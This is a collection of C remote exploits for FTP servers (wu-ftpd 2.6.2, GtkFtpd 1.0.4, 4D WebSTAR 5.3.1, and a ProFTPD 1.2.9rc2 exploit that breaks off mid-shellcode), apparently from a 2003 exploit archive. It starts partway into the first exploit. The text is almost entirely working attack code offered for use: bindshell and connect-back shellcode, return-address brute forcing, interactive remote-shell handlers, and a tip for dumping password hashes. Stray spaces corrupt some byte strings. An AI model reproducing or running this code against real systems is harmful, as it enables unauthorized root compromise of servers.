__exp_test=(SCS);
break;
case 'M':
case 'm':
mx_bf=(atoi(optarg));
bf_lsz=((0x1000)/mx_bf);
break;
case 'H':
case 'h':
memset((char *)tg_host,(NRL),sizeof(tg_host));
strncpy(tg_host,optarg,sizeof(tg_host)-1);
break;
case 'U':
case 'u':
memset((char *)user_id,(NRL),sizeof(user_id));
strncpy(user_id,optarg,sizeof(user_id)-1);
break;
case 'P':
case 'p':
memset((char *)pass_wd,(NRL),sizeof(pass_wd));
strncpy(pass_wd,optarg,sizeof(pass_wd)-1);
break;
case 'N':
case 'n':
tg_port=(atoi(optarg));
break;
case 'S':
case 's':
sh_addr=strtoul(optarg,(NRL),(NRL));
break;
case 'T':
case 't':
if((t_g=(atoi(optarg)))<(9))
sh_addr=(plat[t_g].sh_addr);
else (void)prcode_usage(argv[(NRL)]);
break;
case 'B':
case 'b':
if((t_g=(atoi(optarg)))<(9))
{
sh_addr=(plat[t_g].bf_addr);
__bf=(SCS);
}
else (void)prcode_usage(argv[(NRL)]);
break;
case 'I':
case 'i':
(void)prcode_usage(argv[(NRL)]);
break;
case '?':
(void)prcode_usage(argv[(NRL)]);
break;
}
}
if(!strcmp(user_id,(DEF_STR))||!strcmp(pass_wd,(DE F_STR)))
(void)prcode_usage(argv[(NRL)]);
memset((char *)home_dir,(NRL),sizeof(home_dir));
snprintf(home_dir,sizeof(home_dir)-1,"%s%s",(plat[t_g].home),user_id);
if(!__bf)
{
fprintf(stdout," Target: %s.\n",(plat[t_g].v_nm));
sh_addr=(u_long)null_chk(sh_addr);
fprintf(stdout," [+] address: %p.\n",sh_addr);
fprintf(stdout," #1 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);
sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");
fprintf(stdout," [1] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);
fprintf(stdout," [2] send exploit code.\n");
(void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
close(sock);
fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);
sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");
fprintf(stdout," [3] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);
fprintf(stdout," [4] send exploit code.\n");
(void)make_send_exploit(sock,(NRL),sh_addr,(NRL));
fprintf(stdout," [5] Waiting, execute the shell ");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".\n");
(void)conn_shell(sock,sh_addr);
close(sock);
}
else
{
int bt_num=(NRL);
fprintf(stdout," Brute-Force mode.\n");
fprintf(stdout," [+] BF Count: %d.\n",mx_bf);
fprintf(stdout," [+] BF Size: +%d.\n\n",bf_lsz);
for(bt_num=(NRL);bt_num<(mx_bf);bt_num++)
{
sh_addr=(u_long)null_chk(sh_addr);
fprintf(stdout," [+] Brute-Force address: %p.\n",sh_addr);
fprintf(stdout," #1 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);
sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");
fprintf(stdout," [1] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);
fprintf(stdout," [2] send exploit code.\n");
if(bt_num==(NRL))
{
(void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
}
else
{
(void)make_send_exploit(sock,(SCS),sh_addr,(NRL));
}
close(sock);
fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);
sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");
fprintf(stdout," [3] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);
fprintf(stdout," [4] send exploit code.\n");
(void)make_send_exploit(sock,(NRL),sh_addr,(NRL));
fprintf(stdout," [5] Waiting, execute the shell ");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".\n");
(void)conn_shell(sock,sh_addr);
close(sock);
sh_addr+=(bf_lsz);
}
}
exit(NRL);
}
int setsock(char *u_host,int u_port)
{
int sock;
struct hostent *sxp;
struct sockaddr_in sxp_addr;
if((sxp=gethostbyname(u_host))==(GET_HOST_NM_ERR))
{
return(FAD);
}
if((sock=socket(AF_INET,SOCK_STREAM,(NRL)))==(FAD) )
{
return(FAD);
}
sxp_addr.sin_family=AF_INET;
sxp_addr.sin_port=htons(u_port);
sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
bzero(&(sxp_addr.sin_zero),(SIN_ZR_SIZE));
if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==(FAD))
{
return(FAD);
}
return(sock);
}
void conn_shell(int conn_sock,u_long scs_addr)
{
int died;
int ex_t=(NRL);
char *command,readbuf[(GET_R)];
fd_set rset;
switch(t_g)
{
case 0:
case 1:
case 2:
case 3:
case 4:
case 5:
command=(DEF_COMM);
break;
case 6:
case 7:
case 8:
command=(DEF_COMM_OB);
break;
}
memset((char *)readbuf,(NRL),sizeof(readbuf));
fprintf(stdout," Send, command packet !\n\n");
send(conn_sock,command,strlen(command),(NRL));
for(;;)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(conn_sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(conn_sock+1,&rset,NULL,NULL,NULL);
if(FD_ISSET(conn_sock,&rset))
{
died=read(conn_sock,readbuf,sizeof(readbuf)-1);
if(died<=(NRL))
{
if(!ex_t)
{
fprintf(stderr," [-] exploit failure.\n\n");
return;
}
else
{
fprintf(stdout," exploit successfully ! (&shellcode_addr: %p)\n\n",scs_addr);
exit(NRL);
}
}
readbuf[died]=(NRL);
fprintf(stdout,"%s",readbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
if(died>(NRL))
{
readbuf[died]=(NRL);
if(strstr(readbuf,"exit"))
ex_t=(SCS);
write(conn_sock,readbuf,died);
}
}
}
return;
}
void re_connt(int st_sock_va)
{
if(st_sock_va==(FAD))
{
fprintf(stdout," [ Fail ]\n\n");
exit(FAD);
}
}
void banrl()
{
fprintf(stdout,"\n 0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.\n\n");
}
int check_exp(int sock)
{
int conn_died;
char gt_bf[(GET_R)];
fprintf(stdout,"\n [+] Check exploit test ...\n");
send(sock,"X82\r\n",strlen("X82\r\n"),(NRL)); /* test packet */
(u_int)sleep(SCS);
memset((char *)gt_bf,(NRL),sizeof(gt_bf));
conn_died=read(sock,gt_bf,sizeof(gt_bf)-1);
if(strstr(gt_bf,(CMD_ERROR)))
{
fprintf(stdout," [X] After test exploit, wu-ftpd is alive.\n");
return(FAD);
}
else if(conn_died<=(NRL))
{
fprintf(stdout," Ok, This is vulnerable version.\n\n");
return(SCS);
}
else return(FAD);
}
/* eoc */
// [2003-08-11]
21 GtkFtpd 1.0.4 Remote Root Buffer Overflow Exploit
/************************************************** ********
* [ gtkftpd[v1.0.4(and below)]: remote root buffer overflow exploit. ]
*
* by: vade79/v9 v9 at fakehalo.deadpig.org (fakehalo/realhalo)
*
* Url:
* http://gtkftpd.sourceforge.net/
*
* GtkFtpd, versions v1.0.4 and below(as of this time), contain a
* remotely exploitable buffer overflow. the overflow occurs when
* GtkFtpd allocates the appropriate amount of memory to hold a
* filename or directory(256 bytes), but does not account for the
* date/user/stat prefix(~40 bytes) it prepends to the buffer.
*
* When exploited, things are made easier due to the fact that
* GtkFtpd does not chroot() or drop its root privileges(as are
* required to run the program itself) while running. And one step
* more easier because when the buffer is overflown it is in a child
* process, making it possible to brute force(not crash).
*
* Requirements to exploit:
* - A valid account. (user/pass, anonymous will do)
* - A writable directory. (usually gtkftpd makes any dir writable)
*
* Usage:
* # cc xgtkftpd.c -o xgtkftpd
* # ./xgtkftpd [-Psupcbanrd] -h hostname
* *
* Exploit workings(ftp commands):
* MKDIR <large name/causes overflow>
* LIST -<shellcode> (where the overflow occurs)
*
* The exploitable code itself is found in src/sys_cmd.c:
* 12:#define BUF_SIZE 256
* 21:char buf[BUF_SIZE];
* 57:sprintf(buf, "%s\t%s", perm_date_siz, entr->d_name);
*
* Note:
* Make sure the directory used to "LIST" does not already contain
* any large filenames or directories, as the first overly long one
* to list will cause the overflow. (which will fail the exploit)
* *
* (should work out of the box on generic linux, tested on rh7.1.
* squished, un-tab'd, un-space'd, exploit code; just how i like it.)
************************************************** ********/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <getopt.h>
#include <ctype.h>
#include <time.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/* default definitions, change at will. */
#define DFLUSER "anonymous" /* no argument, default username. */
#define DFLPASS "[email protected]" /* no argument, default password. */
#define DFLDIR "/incoming" /* no argument, default +w directory. */
#define DFLCLM 80 /* default screen width to use. */
#define DFLADDR 0xbffffffa /* base brute address. */
#define TIMEOUT 10 /* connection timeout. */
static char x86_exec[]= /* bindshell(sport), modded from netric. */
/* port defined in byte 20, and 21; in a 'short' cast form. */
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x 66\xcd\x80\x31"
"\xd2\x52\x66\x68\x00\x00\x43\x66\x53\x89\xe1\x6a\x 10\x51\x50\x89"
"\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04\x43\x43\x b0\x66\xcd\x80"
"\x83\xc4\x0c\x52\x52\x43\xb0\x66\xcd\x80\x93\x89\x d1\xb0\x3f\xcd"
"\x80\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x 68\x68\x2f\x2f"
"\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
/* protos/functions. */
char *getdir(unsigned int);
char *getbdir(void);
char *getcode(void);
void filter_text(char *);
void ftp_printf(int,char *,...);
void ftp_clean(int);
void ftp_read(int);
void ftp_parse(int);
void ftp_connect(void);
void getshell(int,unsigned int);
void printe(char *,short);
void usage(char *);
void sig_ctrlc(){printe("user aborted.",1);}
void sig_alarm(){printe("alarm/timeout hit.",1);}
void sig_pipe(){printe("connection closed/failed.",1);}
/* globals. (ease of use throughout) */
unsigned short align=2; /* probably will never need to be otherwise. */
unsigned short port=21; /* generic ftp daemon port. */
unsigned short sport=7979; /* generic bindshell port. */
unsigned short reverse=0; /* go upward, instead of downward */
unsigned short no_io=0; /* do not show traffic. */
unsigned int attempts=100; /* number of times to brute. */
unsigned int columns=80; /* generic screen width. */
unsigned int ftp_i=0; /* Nth time read ftp socket. */
unsigned int baseaddr=DFLADDR; /* base address. (again) */
char *host; /* hostname/target, a must have. */
char *user; /* username to use. */
char *pass; /* password to use. */
char *writedir; /* need a writable directory. */
char *basedir; /* gets filled in later. */
/* program start. */
int main(int argc,char **argv){
int chr=0;
printf(" gtkftpd[v1.0.4(and below)]: remote root buffer overflow"
" exploit.\n by: vade79/v9 [email protected] (fakehalo)\n\n");
/* set the chomp point, filter long lines. */
if(getenv("COLUMNS"))columns=atoi(getenv("COLUMNS"));
if(7>columns||columns>256)columns=DFLCLM;
while((chr=getopt(argc,argv,"h:P:s:u:p:c:b:a:n:rd"))!=EOF){
switch(chr){
case 'h':
if(!host&&!(host=(char *)strdup(optarg)))
printe("main(): allocating memory failed.",1);
break;
case 'P':
port=atoi(optarg);
break;
case 's':
sport=atoi(optarg);
break;
case 'u':
if(!user&&!(user=(char *)strdup(optarg)))
printe("main(): allocating memory failed.",1);
break;
case 'p':
if(!pass&&!(pass=(char *)strdup(optarg)))
printe("main(): allocating memory failed.",1);
break;
case 'c':
if(!writedir&&!(writedir=(char *)strdup(optarg)))
printe("main(): allocating memory failed.",1);
break;
case 'b':
sscanf(optarg,"%x",&baseaddr);
break;
case 'a':
align=atoi(optarg);
break;
case 'n':
attempts=atoi(optarg);
break;
case 'r':
reverse=1;
break;
case 'd':
no_io=1;
break;
default:
usage(argv[0]);
break;
}
}
if(!host)
usage(argv[0]);
/* fill in the blanks, or out of bounds. */
if(!user)user=DFLUSER;
if(!pass)pass=DFLPASS;
if(!writedir)writedir=DFLDIR;
if(!baseaddr)baseaddr=DFLADDR;
if(align>3)align=2;
if(!((sport&0xff00)>>8)||!(sport&0x00ff)){
printf("[!] shell port defined contains null byte(s), using default.\n");
sport=7979; /* back to default. */
}
/* change the bindshell port. */
x86_exec[20]=(sport&0xff00)>>8;
x86_exec[21]=(sport&0x00ff);
/* verbose. */
printf(" target: %s:%d, identity: %s:%s.\n directory: %s, brute"
" start: 0x%.8x, alignment: %d.\n memory direction: %s, attempts: "
"%d, bindshell port: %d.\n\n",host,port,user,pass,writedir,baseaddr,
align,(!reverse?"downward":"upward"),attempts,sport);
signal(SIGINT,sig_ctrlc); /* explained/pretty exit. */
signal(SIGPIPE,sig_pipe); /* handle abnormal disconnects. */
ftp_connect(); /* do the magic, brute force. */
printe("brute force exhausted, failed.",0);
exit(0);
}
char *getdir(unsigned int offset){
unsigned int i=0;
char *buf;
/* 256 will fail; 255 or less. */
if(!(buf=(char *)malloc(255+1)))
printe("getdir(): allocating memory failed.",1);
memset(buf,0x0,255+1);
if(align)memset(buf,'x',align);
for(i=align;i<252;i+=4){
if(!reverse)*(long *)&buf[i]=(baseaddr-offset);
else *(long *)&buf[i]=(baseaddr+offset);
}
return(buf);
}
char *getbdir(void){
char *buf;
time_t ttt;
struct tm *ttm;
if(!(buf=(char *)malloc(32+1)))
printe("getbdir(): allocating memory failed",1);
ttt=time(NULL);
ttm=localtime(&ttt);
strftime(buf,32,"tmp_%H:%M:%S_%d-%m-%Y",ttm);
return(buf);
}
char *getcode(void){
char *buf;
if(!(buf=(char *)malloc(512+1)))
printe("getcode(): allocating memory failed",1);
memset(buf,0x90,(512-strlen(x86_exec)));
memcpy(buf+(512-strlen(x86_exec)),x86_exec,strlen(x86_exec));
return(buf);
}
void filter_text(char *ptr){
unsigned int i=0;
for(i=0;i<strlen(ptr);i++){
/* keep it short and sweet. */
if(i>=(columns-3)){
ptr[i--]=0x0;
ptr[i--]='.';
ptr[i--]='.';
ptr[i]='.';
}
/* don't make \r or \n a '?'. */
else if(ptr[i]=='\r'||ptr[i]=='\n')ptr[i]=0x0;
/* don't ugly the local terminal. */
else if(!isprint(ptr[i]))ptr[i]='?';
}
return;
}
void ftp_printf(int sock,char *fmt,...){
char *buf;
va_list ap;
if(!(buf=(char *)malloc(1024+1)))
printe("ftp_printf(): allocating memory failed.",1);
memset(buf,0x0,1024+1);
va_start(ap,fmt);
vsnprintf(buf,1024,fmt,ap);
va_end(ap);
write(sock,buf,strlen(buf)); /* write it, then mod it for display. */
filter_text(buf);
if(!no_io)
printf("-> %s\n",buf);
free(buf);
return;
}
void ftp_clean(int sock){
ftp_printf(sock,"CWD ..\r\n");
ftp_read(sock);
ftp_printf(sock,"RMD %s\r\n",basedir);
ftp_read(sock);
ftp_printf(sock,"QUIT\r\n");
ftp_read(sock);
return;
}
void ftp_read(int sock){
char *buf;
if(!(buf=(char *)malloc(1024+1)))
printe("ftp_read(): allocating memory failed.",1);
memset(buf,0x0,1024);
read(sock,buf,1024);
filter_text(buf);
if(!no_io)
printf("<- %s\n",buf);
/* some initial reply checking, not too much. */
if(!ftp_i)
if(!strstr(buf,"GtkFTPd"))
printe("this exploit is only for GtkFTPd, failed.",1);
if(ftp_i==2)
if(strncmp(buf,"230",3))
printe("invalid username/password, failed.",1);
if(ftp_i==3)
if(strncmp(buf,"250",3))
printe("invalid writable directory, failed. (try \"/\")",1);
free(buf);
ftp_i++; /* increase the response identifier. */
return;
}
void ftp_parse(int sock){
unsigned int offset=0;
ftp_read(sock); /* get the banner. */
ftp_printf(sock,"USER %s\r\n",user);
ftp_read(sock);
ftp_printf(sock,"PASS %s\r\n",pass);
ftp_read(sock);
ftp_printf(sock,"CWD %s\r\n",writedir);
ftp_read(sock);
basedir=getbdir(); /* tmp dir of our own to use. */
ftp_printf(sock,"MKD %s\r\n",basedir);
ftp_read(sock);
ftp_printf(sock,"CWD %s\r\n",basedir);
ftp_read(sock);
while(offset<(attempts*400)){ /* if it hasn't yet, it's not going to. */
/* slight null-byte/CR check, only needs to check the last byte. */
if((!reverse&&!((baseaddr-offset)&0xff))||(reverse&&!((baseaddr+offset)
&0xff))||(!reverse&&((baseaddr-offset)&0xff)=='\n')||(reverse&&
((baseaddr+offset)&0xff)=='\n')){
printf("[!] brute address contains null-byte/CR, increasing offset "
"by one byte.\n");
offset++; /* one byte off if reversed won't hurt here. (401) */
}
/* make the evil oversized directory. (255 or less bytes) */
ftp_printf(sock,"MKD %s\r\n",getdir(offset));
ftp_read(sock);
/* date+directory exceeds 256 byte buffer, the exploit. */
sleep(1); /* delay insurance. */
ftp_printf(sock,"LIST -%s\r\n",getcode());
/* nothing to read here, and gtkftpd processes (the exploit) */
/* before the ftp list connection is made, making it */
/* pointless to view the list. */
sleep(1); /* delay insurance, again, just to be sure. */
/* delete directory, multiples will cause failure(s). */
ftp_printf(sock,"RMD %s\r\n",getdir(offset));
ftp_read(sock);
getshell(sock,offset);
offset+=400; /* always at least 400 nops in a row, in shellcode. */
}
ftp_clean(sock);
close(sock);
return;
}
void ftp_connect(void){
int sock;
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
if((s.sin_addr.s_addr=inet_addr(host))){
if(!(t=gethostbyname(host)))
printe("couldn't resolve hostname.",1);
memcpy((char*)&s.sin_addr,(char*)t->h_addr,sizeof(s.sin_addr));
}
printf(" attempting to connect: %s:%d.\n",host,port);
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("gtkftpd connection failed.",1);
alarm(0);
printf(" connected successfully: %s:%d.\n",host,port);
ftp_parse(sock);
return;
}
void getshell(int ftpsock,unsigned int offset){
int sock,r;
fd_set fds;
char buf[4096+1];
struct hostent *he;
struct sockaddr_in sa;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))= =-1)
printe("getshell(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(host))){
if(!(he=gethostbyname(host)))
printe("getshell(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,sizeof(sa.sin_addr));
}
sa.sin_port=htons(sport);
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
printf(" checking for bindshell: %s:%d. (0x%.8x)\n",host,sport,
(!reverse?(baseaddr-offset):(baseaddr+offset)));
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",host,sport);
close(sock); /* don't want fd's to fill up. */
alarm(0);
return;
}
alarm(0);
printf(" successfully connected: %s:%d.\n",host,sport);
printf(" attempting to cleanup leftover directory(s).\n");
ftp_clean(ftpsock);
close(ftpsock);
printf(" entering remote shell. (%s:%d)\n\n",host,sport);
signal(SIGINT,SIG_IGN);
write(sock,"cd /;uname -a;id\n",18);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
void printe(char *err,short e){
printf("[!] error: %s\n",err);
if(e)exit(1);
return;
}
void usage(char *name){
printf(" usage: %s [options] -h hostname\n\n options:\n"
" -h <string>\tdefines the target host/ip.\t(REQUIRED)\n"
" -P <number>\tdefines the target port.\t(%d)\n"
" -s <number>\tdefines the bindshell port.\t(%d)\n"
" -u <string>\tdefines the username.\t\t(\"%s\")\n"
" -p <string>\tdefines the password.\t\t(\"%s\")\n"
" -c <string>\tdefines the writable directory.\t(\"%s\")\n"
" -b <string>\tdefines the base brute address.\t(0x%.8x)\n"
" -a <number>\tdefines the alignment.\t\t(%d)\n"
" -n <number>\tdefines the number of attempts.\t(%d)\n"
" -r\t\tgo upward in memory, instead of downward.\n"
" -d\t\tdo not show verbose ftp in/out traffic.\n\n",
name,port,sport,DFLUSER,DFLPASS,DFLDIR,DFLADDR,ali gn,attempts);
exit(0);
}
// [2003-08-28]
21 4D WebSTAR FTP Server Suite Remote Buffer Overflow Exploit
/*
Remote Vulnerability in 4D WebSTAR Server Suite - Exploit
================================================
Date: 11.09.2003
Author: B-r00t. 2003.
Email: B-r00t blueyonder.co.uk
Reference: http://www.4d.com/products/webstar.html
Versions: 4D WebSTAR 5.3.1 (Latest) => VULNERABLE.
Tested: 4D WebSTAR 5.3.1 (Trial Version).
Exploit: 4DWS_ftp.c - On success a bindshell is spawned
on port 6969. Although the resulting shell is
UID 'webstart', it is usually possible to
execute 'nidump passwd .' to obtain the system
password hashes for cracking.
Compile: gcc -o 4DWS_ftp 4DWS_ftp.c
Description: There is a pre authentication buffer overflow
that exists in the login mechanism of the WebSTAR
FTP service. See advisory for further details.
Remember Kiddiez ... An Apple A Day ...!!!!
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
// Defines
#define EXPLOIT "4DWS_ftp"
#define BINDSHELL_PORT 6969
#define FTP_PORT 21
#define MAXSIZE 1024
// Prototypes
int usage (void);
int get_connect (int port, char *host);
int send_sock (char *buff);
int read_sock (char *buff);
int check_bindshell(int port, char *host);
//Variables
int sock, port=21, lsb;
char evilbuff[MAXSIZE], temp[MAXSIZE];
char user[] = "USER 4D4D" "\x0d\x0a";
char retaddy[5], filler[MAXSIZE];
unsigned long int ret, loop;
int main (int argc, char *argv[])
{
char shellcode[] = //PPC forkin bindshell 6969 by B-r00t.2003.
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x68\x02\xa6\x 3b\xeb\x01\x70"
"\x39\x80\x01\x70\x3b\xdf\xff\x88\x7c\xbe\x29\xae\x 3b\xdf\xff\x89"
"\x7c\xbe\x29\xae\x3b\xdf\xff\x8a\x7c\xbe\x29\xae\x 3b\xdf\xff\x8b"
"\x7c\xbe\x29\xae\x38\x6c\xfe\x92\x38\x8c\xfe\x91\x 38\xac\xfe\x96"
"\x38\x0c\xfe\xf1\x44\xff\xff\x02\x60\x60\x60\x60\x 7c\x67\x1b\x78"
"\x38\x9f\xff\x84\x38\xac\xfe\xa0\x38\x0c\xfe\xf8\x 44\xff\xff\x02"
"\x60\x60\x60\x60\x7c\xe3\x3b\x78\x38\x8c\xfe\x91\x 38\x0c\xfe\xfa"
"\x44\xff\xff\x02\x60\x60\x60\x60\x7c\xe3\x3b\x78\x 38\x8c\xfe\x90"
"\x38\xac\xfe\x90\x38\x0c\xfe\xae\x44\xff\xff\x02\x 60\x60\x60\x60"
"\x38\x8c\xfe\x90\x38\x0c\xfe\xea\x44\xff\xff\x02\x 60\x60\x60\x60"
"\x38\x8c\xfe\x91\x38\x0c\xfe\xea\x44\xff\xff\x02\x 60\x60\x60\x60"
"\x38\x8c\xfe\x92\x38\x0c\xfe\xea\x44\xff\xff\x02\x 60\x60\x60\x60"
"\x38\x0c\xfe\x92\x44\xff\xff\x02\x60\x60\x60\x60\x 39\x1f\xff\x83"
"\x7c\xa8\x29\xae\x38\x7f\xff\x7c\x90\x61\xff\xf8\x 90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0c\xfe\xcb\x44\xff\xff\x02\x 41\x41\x41\x41"
"\x41\x41\x41\x41\x2f\x62\x69\x6e\x2f\x73\x68\x58\x ff\x02\x1b\x39"
"\x41\x41\x41\x41"; // Yu Cant Get This Stuff In Storez Man!!!
char nops[] =
"\x60\x60\x60\x60\x60\x60\x60\x60";
printf ("\n%s by B-r00t <[email protected]>. (c) 2003.\n",
EXPLOIT);
printf ("\nExploits the pre authentication buffer overflow in
the");
printf ("\nWebSTAR 5.3.1 FTP service.");
if (argc < 2)
usage ();
printf ("\nPatience ...\n\n");
memset(filler, '\0', sizeof(filler));
memset(filler, 0x78, 173);
filler[0] = 'P';
filler[1] = 'A';
filler[2] = 'S';
filler[3] = 'S';
filler[4] = 0x20;
for (lsb=0; lsb<9; lsb+=4) {//Increase range if no succcess.
for (loop=0xf018f504+lsb; loop<0xf028f505+lsb; loop+=0x1000)
{
ret=loop;
printf ("\n[0x%x] ", ret);
retaddy[0] = (int)((ret & 0xff000000) >> 24);
retaddy[1] = (int)((ret & 0x00ff0000) >> 16);
retaddy[2] = (int)((ret & 0x0000ff00) >> 8);
retaddy[3] = (int) (ret & 0x000000ff);
retaddy[4] = '\0';
memset(evilbuff, '\0', sizeof(evilbuff));
strcpy (evilbuff, filler);
strcat (evilbuff, retaddy);
strcat (evilbuff, nops);
strcat (evilbuff, shellcode);
strcat (evilbuff, "\x0d\x0a");
if ((sock=socket(AF_INET, SOCK_STREAM, 6)) == -1)
{
perror(" Retrying! ");
loop-=0x1000;
sleep(2);
continue;
}
if (get_connect(FTP_PORT, argv[1]) ==-1)
{
perror(" Retrying! ");
loop-=0x1000;
sleep(2);
close(sock);
continue;
}
read_sock(temp);
send_sock (user);
read_sock(temp);
send_sock (evilbuff);
read_sock(temp);
close(sock);
sleep(3);// Let service respawn!
check_bindshell(BINDSHELL_PORT, argv[1]);
}}
printf("\n\nIf its still up... Go Again!\n\n");
exit(0);
}//End_Main
//Check For Bindshell 6969
int check_bindshell(int port, char *host)
{
fd_set rfds;
int sel=0, rd=0;
char *ptr = temp;
memset(temp, '\0', MAXSIZE);
if((sock=socket(AF_INET, SOCK_STREAM, 6))== -1)
{
perror("Socket Error.");
return -1;
}
if (get_connect(port, host) <0)
{
close (sock);
return -1;
}
else printf (" Yay~!\n\aWo0tWo0t! ... We got a shell on
%s!\n\n>", host);
// Start clean ..
fflush(stdin);
fflush(stdout);
fflush(stderr);
do {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(sock, &rfds);
sel=select(sock+1, &rfds, NULL, NULL, NULL);
memset(temp, '\0', MAXSIZE);
if (sel) {
if(FD_ISSET(sock, &rfds)) {
rd=(read_sock(temp));
printf("%s", temp);
}
if(FD_ISSET(0, &rfds)) {
rd=(read(0, ptr, MAXSIZE-1));
send_sock(temp);
}
}
} while( sel && rd );
close(sock);
printf ("\nShell Aborted!\n");
exit(0);
}
//Do Socket Connect
int get_connect (int port, char *host)
{
struct sockaddr_in dest_addr;
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(port);
if (! inet_aton(host, &(dest_addr.sin_addr)))
return -1;
memset( &(dest_addr.sin_zero), '\0', 8);
if (connect (sock, (struct sockaddr *)&dest_addr, sizeof
(struct sockaddr)) == -1)
{
printf(" Fail!");
close(sock);
return -1;
}
else return 0;
}
//Send Data To Socket
int send_sock (char *buff)
{
int bytes = 0;
bytes = (send (sock, buff, strlen(buff), 0));
if (bytes == -1)
{
perror("Send Error.");
close(sock);
return -1;
}
else return bytes;
}
//Read Data From Socket
int read_sock (char *buff)
{
int bytes = 0;
bytes = (recv (sock, buff, MAXSIZE-1, 0));
if (bytes == -1)
{
perror ("Recv Error.");
close(sock);
return -1;
}
else return bytes;
}
//Usage Message
int usage (void)
{
printf ("\n\nUsage: %s [IP_ADDRESS] ", EXPLOIT);
printf ("\nExample: %s 10.0.0.1 \n\n", EXPLOIT);
exit (-1);
}
// [2003-09-11]
21 ProFTPD 1.2.9rc2 ASCII File Remote Root Exploit
/* proftpd 1.2.7/1.2.9rc2 remote root exploit by bkbll (bkbll#cnhonker.net, 2003/10/1)
* for FTP_ProFTPD_Translate_Overflow found by X-force
* happy birthday, China.
* this code is dirty, there are more beautiful exploits of proftpd for this vuln in the world.
* this code want to provied u a method, not finally exploit.
* using overflow _xlate_ascii_write function return address.
* because the overflow is before it connecting to our port,so I have no method for using current socket.
* and I have provied two method:bind port and connect back.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define PORT 21
#define SIZE 1024
#define BIGSIZE 1024*42
#define OFFSET 39 //cbshellcode ip & port offset,0 is the first
#define OFF2 70 //bindshellcode port offset,0 is the first
#define VER "1.20"
char cbshellcode[]= //from www.netric.org,and modified some code by myself
"\x31\xc0\x31\xdb\x31\xc9\xb0\x17"
"\xcd\x80\x31\xc0\x51\xb1\x06\x51"
"\xb1\x01\x51\xb1\x02\x51\x89\xe1"
"\xb3\x01\xb0\x66\xcd\x80\x89\xc2"
"\x31\xc0\x31\xc9\x51\x51\x68\x41"
"\x42\x43\x44\x66\x68\xb0\xef\xb1"
"\x02\x66\x51\x90\x89\xe7\xb3\x10"
"\x53\x57\x52\x89\xe1\xb3\x03\xb0"
"\x66\xcd\x80\x31\xc9\x39\xc1\x74"
"\x06\x31\xc0\xb0\x01\xcd\x80\x31"
"\xc0\xb0\x3f\x89\xd3\xcd\x80\x31"
